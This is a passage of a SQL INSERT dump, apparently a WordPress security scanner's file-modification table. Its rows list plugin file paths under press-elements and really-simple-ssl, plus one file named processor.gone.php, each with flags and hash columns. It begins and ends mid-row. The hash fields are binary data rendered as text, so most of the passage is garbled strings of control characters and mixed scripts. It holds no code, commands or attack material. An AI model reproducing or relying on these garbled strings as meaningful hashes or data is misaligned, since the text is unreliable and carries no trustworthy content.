\Z]6;r1>','',0,'?'),('يI-MUC#Y','wp-content/plugins/press-elements/libs/freemius/templates/debug/plugins-themes-sync.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wIS\0\\','r(,]12r 3`㍂j','',0,'?'),('amRQ`.N3','wp-content/plugins/press-elements/libs/freemius/templates/debug/scheduled-crons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fendNTA}/','dKA\\\Zp;HH	H','',0,'?'),('G\"\rc;O','wp-content/plugins/press-elements/libs/freemius/templates/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zf','!\"\"p3\n؃[+&U@~','',0,'?'),('Ȝ\Z1/Z','wp-content/plugins/press-elements/libs/freemius/templates/email.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{7qB&','mJfP1(o43)\n5β','',0,'?'),('F*<1<J','wp-content/plugins/press-elements/libs/freemius/templates/firewall-issues-js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','``Îߍp','tr+vZzEipdolz5-l','',0,'?'),('k/mHBEj(r','wp-content/plugins/press-elements/libs/freemius/templates/forms/affiliation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g)	]^,f <','.ҝhZ$\Z+Q\n[gQK','',0,'?'),('=4	\0O','wp-content/plugins/press-elements/libs/freemius/templates/forms/deactivation/contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nYh<K','˅ +Us	;=ls','',0,'?'),('=zs(/`¯','wp-content/plugins/press-elements/libs/freemius/templates/forms/deactivation/form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bLeZ٢-e','\\^z̍7yW\ZUC)$6P','',0,'?'),(':\\`?PYr?l','wp-content/plugins/press-elements/libs/freemius/templates/forms/deactivation/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=सtgE7','*yv\rJP-:T@\n8$0','',0,'?'),('D\\sjc\'}\rS','wp-content/plugins/press-elements/libs/freemius/templates/forms/deactivation/retry-skip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/V_kXHL','6ϛUg obzO*6KQxP#','',0,'?'),('\'S\rMRi^{','wp-content/plugins/press-elements/libs/freemius/templates/forms/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=सtgE7','*yv\rJP-:T@\n8$0','',0,'?'),('|uUk<T','wp-content/plugins/press-elements/libs/freemius/templates/forms/license-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Պy44b8	z','^>TJHH6Ƕ3<.%','',0,'?'),('ܝ5E&Gr','wp-content/plugins/press-elements/libs/freemius/templates/forms/optout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b22y4r[~\nb','Jh1;FCn$sA\\\\\0P','',0,'?'),('i!ٷ','wp-content/plugins/press-elements/libs/freemius/templates/forms/resend-key.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|c5]+˂=ѿ','\\)$co_\Z<L	ؔ7\\nN*R','',0,'?'),('L*_t','wp-content/plugins/press-elements/libs/freemius/templates/forms/trial-start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iݫD/(3','ÐHs	R#\"TC\nW[08.$\'\Z','',0,'?'),('\\	ģUG','wp-content/plugins/press-elements/libs/freemius/templates/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=सtgE7','*yv\rJP-:T@\n8$0','',0,'?'),('(尌jZ2\Z','wp-content/plugins/press-elements/libs/freemius/templates/js/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=सtgE7','*yv\rJP-:T@\n8$0','',0,'?'),(';mr!/`','wp-content/plugins/press-elements/libs/freemius/templates/js/jquery.content-change.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ql2qA','K3bՊ<yTTQ^d(*\0','',0,'?'),('V^rP=wM','wp-content/plugins/press-elements/libs/freemius/templates/js/style-premium-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gl}h\r','gF\nx(2Zd,ROT\"6`','',0,'?'),('OGit(5PC','wp-content/plugins/press-elements/libs/freemius/templates/plugin-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mR$xO#Kf',')FgTA1zdz|2b','',0,'?'),('06r[[\\','wp-content/plugins/press-elements/libs/freemius/templates/plugin-info/description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4[@Pe=FwT','J)S>	8u#rA!E','',0,'?'),('l3~HZX	','wp-content/plugins/press-elements/libs/freemius/templates/plugin-info/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Xz}!UWs!','S\"\00t`q.*d1P;Zc.9','',0,'?'),('U5','wp-content/plugins/press-elements/libs/freemius/templates/plugin-info/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=सtgE7','*yv\rJP-:T@\n8$0','',0,'?'),('ÜՂ__x','wp-content/plugins/press-elements/libs/freemius/templates/plugin-info/screenshots.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e? g4Y]','ɹS@	MH<*7F,\Z','',0,'?'),('2Fwߦ?J>','wp-content/plugins/press-elements/libs/freemius/templates/powered-by.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5Bk','d!#*\ZYL\rkwj=Q&','',0,'?'),('ІN׎<h,','wp-content/plugins/press-elements/libs/freemius/templates/pricing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B9N','pDC_VU>JHKFicf;n%WJ#%','',0,'?'),('Ma늁\nyc','wp-content/plugins/press-elements/libs/freemius/templates/secure-https-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PjB7qȭ]','Er\"Oڦf}S{','',0,'?'),('tC늯z','wp-content/plugins/press-elements/libs/freemius/templates/sticky-admin-notice-js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZuD.0@`d0','Lw?H+c2nz8G','',0,'?'),('W~ҕϺXhm&','wp-content/plugins/press-elements/libs/freemius/templates/tabs-capture-js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	\r\Z<\0 ','@71ʬܧA\Z{ܘyq$1s)','',0,'?'),('TRV:6','wp-content/plugins/press-elements/libs/freemius/templates/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%[\\Sfxc-54','?:sB^;!Gg>ݎ;Iu','',0,'?'),('p9́+Dxw-','wp-content/plugins/press-elements/libs/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V=\\bP','k~	UH\ZxPĀ<;X','',0,'?'),('/0uyI','wp-content/plugins/press-elements/libs/twentytwenty/jquery.event.move.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':VmxEX(','3\r\ZA;-k2?H	1','',0,'?'),('mI>jwn{','wp-content/plugins/press-elements/libs/twentytwenty/jquery.twentytwenty.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1-Zhڜ!2','>;\r2wY7Hǂ&oǷGd!J\\|','',0,'?'),('DB5heJ?0','wp-content/plugins/press-elements/libs/typed/typed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+$/&8-','F\'6yow\"\0}ʽiy$','',0,'?'),('M{6kzٝ','wp-content/plugins/press-elements/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&QUD$ź&dQ=','`w	cM!\Zyt:Iޗ\rЭ0','',0,'?'),('kH=Xtol','wp-content/plugins/press-elements/press-elements-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˮiz(ק','njo18ؑy^ V','',0,'?'),('p3|6\'xb}','wp-content/plugins/press-elements/press-elements-freemius.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R̖:3wT',' Tנt0QStf}m_tu','',0,'?'),('[Ձ\0*?G\0','wp-content/plugins/press-elements/press-elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oBRģ	S\n','b#ԄoqM士OQp\\+FB^4f','',0,'?'),('\r+2i~','wp-content/plugins/press-elements/readme.txt',0,'ކ!\ZԀ;','ކ!\ZԀ;','<dEM6M5(H~4F`','',0,'?'),('hѨzݡl4k','wp-content/plugins/press-elements/screenshot-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(<ҷ','JJ4N^W)$.qn{b?E','',0,'?'),('+G\Zfd>','wp-content/plugins/press-elements/screenshot-10.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԖE\\VQGqW','̐u|-ݟ=n82~-','',0,'?'),('?xQPUL&	','wp-content/plugins/press-elements/screenshot-11.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rio0$v','qrȑNGWvmr$','',0,'?'),('\ntK2xa6(6','wp-content/plugins/press-elements/screenshot-12.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bCzPxl','#Uʺ=\"?	꺠/c7','',0,'?'),('j<i^\Z\0Y','wp-content/plugins/press-elements/screenshot-13.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0WAt5/WU','܍tT+UK}\0O@]*],z','',0,'?'),('=4ʨEtP\r','wp-content/plugins/press-elements/screenshot-14.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2ȁxIOnT\0','tqRq{Ñ7-T\';r项 e','',0,'?'),('BfgNU4','wp-content/plugins/press-elements/screenshot-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vo83wa','=`JK7Zbs.LVtY','',0,'?'),('>Ŷ.\nO%','wp-content/plugins/press-elements/screenshot-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NxvHu6Xmӡ','5EJTHRBw(k9','',0,'?'),('=&Pqt','wp-content/plugins/press-elements/screenshot-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\\\ZҲ:i`q','63g<?e٨`(2W2D\"','',0,'?'),('҉%ZoiP','wp-content/plugins/press-elements/screenshot-5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6MYK:N!q','sD?iQoCX\nbK','',0,'?'),(',vғ\0(ͿY','wp-content/plugins/press-elements/screenshot-6.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fu','[<0@fEfln\"\n}%\rU','',0,'?'),('eq/w','wp-content/plugins/press-elements/screenshot-7.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dnNKrD','xjH5<n\'m+&or-S,)','',0,'?'),('qШ.]-@L','wp-content/plugins/press-elements/screenshot-8.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','570DSH','|8T+ᢔTzgndMn4S','',0,'?'),(',Ͷ\rb%','wp-content/plugins/press-elements/screenshot-9.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',', ~i~','\0d70\r1HWW\rFf|*Nk4\r%','',0,'?'),('Id̝M]M[s','wp-content/plugins/press-elements/widgets/advanced-custom-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J+|jU$','8{zs\Zo3a','',0,'?'),('KVg`ǅ8','wp-content/plugins/press-elements/widgets/before-after-effect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SH=}w+e[','U	72dEzn6hu1N','',0,'?'),('4\Z9~DAU02&','wp-content/plugins/press-elements/widgets/flickr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qx>5A*!','>ūGCw&]ڃx','',0,'?'),(')oQ[k	-p!$5','wp-content/plugins/press-elements/widgets/gravatar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-/6M0','*\0DPN_ q֫WHsx\n','',0,'?'),('\'+K)J','wp-content/plugins/press-elements/widgets/image-accordion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','shBܼ#L','{9\0+$\0\\*Z$t!\n!XU','',0,'?'),('aV	{\r!OZB$*O','wp-content/plugins/press-elements/widgets/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V=\\bP','k~	UH\ZxPĀ<;X','',0,'?'),('7InnK%x','wp-content/plugins/press-elements/widgets/notes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/_võ+','$P䟲ztABVMiD.v=','',0,'?'),('(,zئ','wp-content/plugins/press-elements/widgets/pinterest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P(','^| YtÉ0TIw','',0,'?'),('kyL_x','wp-content/plugins/press-elements/widgets/post-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~l&#ê]^b','8\rb8iXͰY*m7*p][Ü5','',0,'?'),('B#eޅ','wp-content/plugins/press-elements/widgets/post-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Նcrbdާ','﻿0}i,Օ0nj?','',0,'?'),('n]77\0jY D`','wp-content/plugins/press-elements/widgets/post-custom-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G-\0\r9X$','<tt6y=68	8TrXΤ','',0,'?'),('sj?`s','wp-content/plugins/press-elements/widgets/post-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ϥĘfmsgb','J¨	tj\r»wm\n$䌪|','',0,'?'),('qSU!ez','wp-content/plugins/press-elements/widgets/post-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=h.YgbS','3舔2,n~uFo','',0,'?'),('(f\ZluڱZd','wp-content/plugins/press-elements/widgets/post-featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5Ed<VЌ(','Go~9K͚37M27Ȧ','',0,'?'),('^vGOpNs','wp-content/plugins/press-elements/widgets/post-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')lpگn1e:Jg','!5qٗot+:B\rL','',0,'?'),('6\Z>ɍjKA\"`','wp-content/plugins/press-elements/widgets/post-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gg`xE]','H.`kXO۔uxA7~#','',0,'?'),('Q);Mq','wp-content/plugins/press-elements/widgets/site-counters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';G	cѩ\n<','\nOٷrΦ_j0,%?N5','',0,'?'),('(&K7V\\\nϓ','wp-content/plugins/press-elements/widgets/site-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ͧ3\nxbL\\\\','<BySIT6*ra1C','',0,'?'),('B3RX$]HT','wp-content/plugins/press-elements/widgets/site-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NRP)N?','̙p	}\rtq7!v~&7%','',0,'?'),('5B@EHD-','wp-content/plugins/press-elements/widgets/site-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!/P#GsPE','>Oӻ!ebsl҃%#ˀS*i/u','',0,'?'),('˲C+VG{\n','wp-content/plugins/press-elements/widgets/typing-effect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d|gc\\N','W$Sűk{c/Ա6W!zE','',0,'?'),('\ZPbw\Zb','wp-content/plugins/processor.gone.php',0,'ُ\0	B~','ُ\0	B~','Bșo$\'AdLxRU','',0,'?'),('XF^0QR','wp-content/plugins/really-simple-ssl/assets/complianz.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!ݬ	ޅllr','\nh)Y[aM\\e5o8i','',0,'?'),('ￒ! f','wp-content/plugins/really-simple-ssl/assets/edd-moneybird.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+p7L	%','PܭX b#|^g\\qoIT','',0,'?'),('b\nۑϟA`VD','wp-content/plugins/really-simple-ssl/assets/icon-128x128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3 ݗV\"w$ʌ','$/ЩRD!tKzsĲW','',0,'?'),('\0r,Y5+fi','wp-content/plugins/really-simple-ssl/assets/logo-really-simple-ssl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'WFoGW4','ԣJ5B:+raTۏgeJB\rv\"w','',0,'?'),('8wͩlw','wp-content/plugins/really-simple-ssl/assets/mail-alerts.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';0jHZ','Nq};Hq(=CYd','',0,'?'),('<`S	!p>S','wp-content/plugins/really-simple-ssl/assets/most-visited.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D6ut5A,\040','\n@5Xe~5FEϰ$	','',0,'?'),('[=ڀў˝`','wp-content/plugins/really-simple-ssl/assets/really-simple-plugins.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C 2Fc31o','tЦ<ra$1kQfEfGe','',0,'?'),('%\0OOmlq0','wp-content/plugins/really-simple-ssl/assets/rsssl-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EUrhFx','5@l}3NojtYŪKHA^,_','',0,'?'),('dY`2k\n$[I','wp-content/plugins/really-simple-ssl/assets/tagging.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wly_K','}.o0\'<N)QIvQ','',0,'?'),('\"\"t$8Hp','wp-content/plugins/really-simple-ssl/assets/woocommerce-moneybird.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':e*/c}','pS)xb;PA%R,IU~!>(E','',0,'?'),('7#L)}xt','wp-content/plugins/really-simple-ssl/assets/wpsearchinsights.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\\h\'ZY}','qB-\n=Y&K4G[eA*1','',0,'?'),(' /{E1ly:','wp-content/plugins/really-simple-ssl/assets/ziprecipes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4 J^}f]=Ya','̬RkRu,VqB6}&\Z','',0,'?'),('zY#1ApVm','wp-content/plugins/really-simple-ssl/class-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jy&+q',' pƇ,i,Tw,:-QT̝-','',0,'?'),('܍ށ bu','wp-content/plugins/really-simple-ssl/class-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',b]f\\ݫ','OinX7We`|NXB*|:d','',0,'?'),('Pۍ\\a&gS@_','wp-content/plugins/really-simple-ssl/class-certificate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zd-E','3	`y]	{7y̐_3DYJ','',0,'?'),('\'GB\n\'MTi','wp-content/plugins/really-simple-ssl/class-front-end.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vǿ,$ɵǭe','\0SL2P\'&Y܏d;3@','',0,'?'),('-{Vs5','wp-content/plugins/really-simple-ssl/class-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&=V)IL','͇> )VTgKEpa6hB','',0,'?'),('^\0j','wp-content/plugins/really-simple-ssl/class-mixed-content-fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#>*qe','_):I}\ZSt)̙U--y','',0,'?'),('>qf?=','wp-content/plugins/really-simple-ssl/class-multisite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p-áK\Z<a','ni(\">$>sio]*N','',0,'?'),('N\0/GL:sw','wp-content/plugins/really-simple-ssl/class-rsssl-wp-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`F:Lbp͟b','\'T5V)8ʺCDd!@','',0,'?'),('TqQ;iTIt	','wp-content/plugins/really-simple-ssl/class-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Pq;:~*','ytp:rŸ>J͂^R9GڜP','',0,'?'),('9y+_@A~','wp-content/plugins/really-simple-ssl/class-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*urggUfwMj','2Gɦpb[ƻ=Agr','',0,'?'),(',E6	]M8}d','wp-content/plugins/really-simple-ssl/class-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5K@ϗxl<','h<#0Џ<sQcM2l1rԕ','',0,'?'),('7*&R5','wp-content/plugins/really-simple-ssl/css/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-(KSYUv',')\Z?{a3{W`EX-','',0,'?'),('GRA䤅','wp-content/plugins/really-simple-ssl/css/main-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/swH∙C~','=S&9q%B#H~','',0,'?'),('qN p*Xk¿\Z','wp-content/plugins/really-simple-ssl/css/main-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߺSl_y$(Z}','X*b?v>I^:c','',0,'?'),('cVE!e 4','wp-content/plugins/really-simple-ssl/css/main.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}c\\V<m/9\0','	RWEl<nr2̲$O$)','',0,'?'),('F:-k~,8 \ns','wp-content/plugins/really-simple-ssl/css/main.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	2\r]0g3T','ua^$fGP IVv%p,E.','',0,'?'),('{,EО}m@bт','wp-content/plugins/really-simple-ssl/force-deactivate.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C|e}O','zYڲ?\08õMȰJ','',0,'?'),('^VNiLvs','wp-content/plugins/really-simple-ssl/img/check-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z)w*@J#P','0MZ@{pp;{Ё*ݷ}М0r','',0,'?'),('b/2sؚT','wp-content/plugins/really-simple-ssl/img/cross-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O}WZVNq%4ʠH','(y\'ln=C+Ow\\JY','',0,'?'),('Ra\rWd*=','wp-content/plugins/really-simple-ssl/img/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-(KSYUv',')\Z?{a3{W`EX-','',0,'?'),('iZѶm@O?O','wp-content/plugins/really-simple-ssl/img/warning-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G<\n','5	o%F<KEە\ZɺhZ','',0,'?'),('UJJ0EG}','wp-content/plugins/really-simple-ssl/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-(KSYUv',')\Z?{a3{W`EX-','',0,'?'),('2O8uK','wp-content/plugins/really-simple-ssl/languages/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-(KSYUv',')\Z?{a3{W`EX-','',0,'?'),(')17\0-Xn$','wp-content/plugins/really-simple-ssl/languages/really-simple-ssl-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N0Vu}Ɖҵn','HaZXZՁ,`y}vj\0B','',0,'?'),('>9%7S&G','wp-content/plugins/really-simple-ssl/languages/really-simple-ssl-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';vPĚ','bHfj4JđXi-w','',0,'?'),('Q0u{HFbL','wp-content/plugins/really-simple-ssl/languages/really-simple-ssl-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b4ri+','Ό7wdt0-IwcG4xZ|','',0,'?'),('j/6(#;ْ','wp-content/plugins/really-simple-ssl/languages/really-simple-ssl-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$\"^D\nfuS','ҏz\'/VV\Z|+&&E','',0,'?'),('*b͚Ȫ~F','wp-content/plugins/really-simple-ssl/languages/really-simple-ssl.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K90gJs\0\r','&B\nK}N< BNؕp>nCP','',0,'?'),('re^U)UZ','wp-content/plugins/really-simple-ssl/multisite-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','03}0S)a\r<7','LU\'\n[oD\"0O\'^-f>]','',0,'?'),('$,V\n','wp-content/plugins/really-simple-ssl/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d>>l6 q8','K~A7r}5g07*B)','',0,'?'),('_ҹfp','wp-content/plugins/really-simple-ssl/rlrsssl-really-simple-ssl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Lq.4mlr','(cnz\0|cdq1@ޝ8:ޯ','',0,'?'),(')oAw*','wp-content/plugins/really-simple-ssl/ssl-test-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9IHrC^jiA]}/&','E3	u5wT#TB9%','',0,'?'),('ؖ.&{R','wp-content/plugins/really-simple-ssl/testssl/cdn/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7V۠H^(J','\rOTì]5@>G`2h	2\0','',0,'?'),('<􏘮L%t{36','wp-content/plugins/really-simple-ssl/testssl/cdn/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('ux7\r\'tQ','wp-content/plugins/really-simple-ssl/testssl/cloudflare/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7˭ӍÒWv8qGP','w\Z\\l8UǑf{\Z','',0,'?'),('Yť =:tZB\rs','wp-content/plugins/really-simple-ssl/testssl/cloudflare/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('I˝ܫ\n-','wp-content/plugins/really-simple-ssl/testssl/cloudfront/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y&OEԶc','(Pї;Gt2r;u}Fޖ/','',0,'?'),('@}xfd','wp-content/plugins/really-simple-ssl/testssl/cloudfront/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),(' Fi69	','wp-content/plugins/really-simple-ssl/testssl/envhttps/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̝=J+rZ5','0CJO\Z]\n`Z4`VR','',0,'?'),('>\"^^`6+','wp-content/plugins/really-simple-ssl/testssl/envhttps/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('X`O?%\'9է','wp-content/plugins/really-simple-ssl/testssl/loadbalancer/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B\ZVŹME','`m}G`\0̑V¿\\oSְ/|^_R\"','',0,'?'),('+5N','wp-content/plugins/really-simple-ssl/testssl/loadbalancer/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('-r}ד','wp-content/plugins/really-simple-ssl/testssl/serverhttps1/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7;9ZmM','Q3<0mdbnR:_uA2i','',0,'?'),('E;q83O\'Y}','wp-content/plugins/really-simple-ssl/testssl/serverhttps1/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('hz[Cj8JTM','wp-content/plugins/really-simple-ssl/testssl/serverhttpson/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m&\rsU','3xlz[Δ%8)Wqs','',0,'?'),('Wo	\n4xw.','wp-content/plugins/really-simple-ssl/testssl/serverhttpson/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('\'ecײ@#Ƌ','wp-content/plugins/really-simple-ssl/testssl/serverhttpxforwardedssl1/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zth_\Zn','Kegv*@,ju0V\n=','',0,'?'),('cZ0{ǟK~v','wp-content/plugins/really-simple-ssl/testssl/serverhttpxforwardedssl1/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('R89nG\n\"\0','wp-content/plugins/really-simple-ssl/testssl/serverhttpxforwardedsslon/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7V۠H^(J','\rOTì]5@>G`2h	2\0','',0,'?'),('?%llǛA','wp-content/plugins/really-simple-ssl/testssl/serverhttpxforwardedsslon/ssl-test-page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0&-','ӪGDf:ڝlk#L+J5B','',0,'?'),('i͸	p','wp-content/plugins/really-simple-ssl/testssl/serverhttpxproto/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l;֕F:cE\\','dUEO